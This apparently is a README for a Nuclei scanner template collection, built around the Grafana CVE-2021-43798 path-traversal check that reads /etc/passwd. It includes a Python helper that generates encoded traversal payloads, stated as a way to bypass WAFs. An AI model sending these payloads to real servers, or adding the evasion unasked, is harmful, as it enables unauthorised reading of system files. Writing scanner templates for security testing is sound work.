If you are a Nuclei templates contributor, write your templates in HTTP raw request format to keep this repository up to date, e.g.:
```yaml
id:

info:
  name:
  author:
  severity:

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*

    # all matchers below must hit for a result to be reported
    matchers-condition: and
    matchers:
      - type: status
        status:
          -

      - type: word
        words:
          - ""
          - ""
        condition: and

      - type: word
        part: header
        words:
          - ""
```
Planning
I'm trying to modify Nuclei's templates to make them more powerful, e.g. CVE-2021-43798:
```yaml
id: CVE-2021-43798

info:
  name:
  author:
  severity:

requests:
  - method: GET
    path:
      - "{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"

      - type: status
        status:
          - 200
```
I'm going to replace `../../../../../../../../../../../../../../../../../../../etc/passwd` with `{{FILE-unix}}`:
```yaml
id: CVE-2021-43798

info:
  name:
  author:
  severity:

requests:
  - method: GET
    path:
      # {{FILE-unix}} is not a nuclei built-in variable (unlike {{BaseURL}}),
      # so the value must be supplied by the operator, e.g. as a template payload.
      - "{{BaseURL}}/public/plugins/alertlist/{{FILE-unix}}"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"

      - type: status
        status:
          - 200
```
That will help bypass WAFs by using custom payloads, because I think all WAFs detect `../../etc/passwd`, so using `../../etc/passwd` is going to be useless, but using custom payloads is going to be useful.
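As an added example (not code from this repository or from nuclei itself), here is a small Python helper that does the rewrite described above: it turns a hard-coded `../../etc/passwd` traversal in a template into the `{{FILE-unix}}` placeholder, fills the placeholder with an operator-chosen payload, and checks that the payload still resolves to `/etc/passwd` once URL decoding and dot-segment normalisation are applied. The function names are hypothetical and the sample template is constructed from the CVE-2021-43798 template shown above. The check matters because a custom payload that a WAF does not recognise is only useful if the target still resolves it to the intended file; the `....//` variant, for example, only works against servers that strip `../` once, so a plain normalisation reports it as not resolving.

```python
"""
Added example (not code from this repository or from nuclei itself): rewrite a
hard-coded ../../etc/passwd traversal into {{FILE-unix}}, render the
placeholder with a custom payload, and check the payload still normalises to
/etc/passwd. Function names are hypothetical.
"""
import posixpath
import re
from urllib.parse import unquote

PLACEHOLDER = "{{FILE-unix}}"

# One or more "../" (or "..\") segments ending in etc/passwd, so the depth of
# the traversal does not matter.
TRAVERSAL_RE = re.compile(r"(?:\.\.[/\\])+etc/passwd")

# Constructed sample: the page's CVE-2021-43798 template, trimmed to the
# request section. {{BaseURL}} is a real nuclei built-in and is left alone.
SAMPLE_TEMPLATE = """id: CVE-2021-43798

requests:
  - method: GET
    path:
      - "{{BaseURL}}/public/plugins/alertlist/../../../../../../../../etc/passwd"
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"
"""


def templatize(template_text: str) -> str:
    """Replace every hard-coded /etc/passwd traversal with {{FILE-unix}}."""
    return TRAVERSAL_RE.sub(PLACEHOLDER, template_text)


def render(template_text: str, payload: str) -> str:
    """Fill {{FILE-unix}} with the payload the operator wants to send.

    {{FILE-unix}} is not a nuclei built-in variable, so a value has to come
    from somewhere; this function stands in for that step.
    """
    return template_text.replace(PLACEHOLDER, payload)


def resolves_to(base_dir: str, payload: str, target: str = "/etc/passwd") -> bool:
    """Return True if base_dir joined with the payload normalises to target.

    Decoding twice covers single- and double-URL-encoded slashes; backslashes
    are treated as separators. posixpath.normpath discards ".." segments that
    try to climb above "/", which is why surplus "../" do no harm.
    """
    decoded = unquote(unquote(payload)).replace("\\", "/")
    return posixpath.normpath(posixpath.join(base_dir, decoded)) == target


if __name__ == "__main__":
    generic = templatize(SAMPLE_TEMPLATE)
    print(generic)
    for payload in (
        "../../../../../../etc/passwd",            # classic
        "..%2f..%2f..%2f..%2fetc/passwd",          # URL-encoded slashes
        "..%252f..%252f..%252f..%252fetc/passwd",  # double-encoded slashes
        "....//....//....//etc/passwd",            # needs a server that strips "../" once
    ):
        ok = resolves_to("/public/plugins/alertlist/", payload)
        print(f"{payload!r} resolves to /etc/passwd after normalisation: {ok}")
        if ok:
            print(render(generic, payload))
```

Running the script prints the templatized YAML and then, for each constructed payload, whether it still lands on `/etc/passwd`; only the payloads that do are rendered into the template.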
Help me!
These days I'm trying to find a junior web penetration testing position, but it must be remote because I'm still a student, so if you can help me, DM me on Twitter.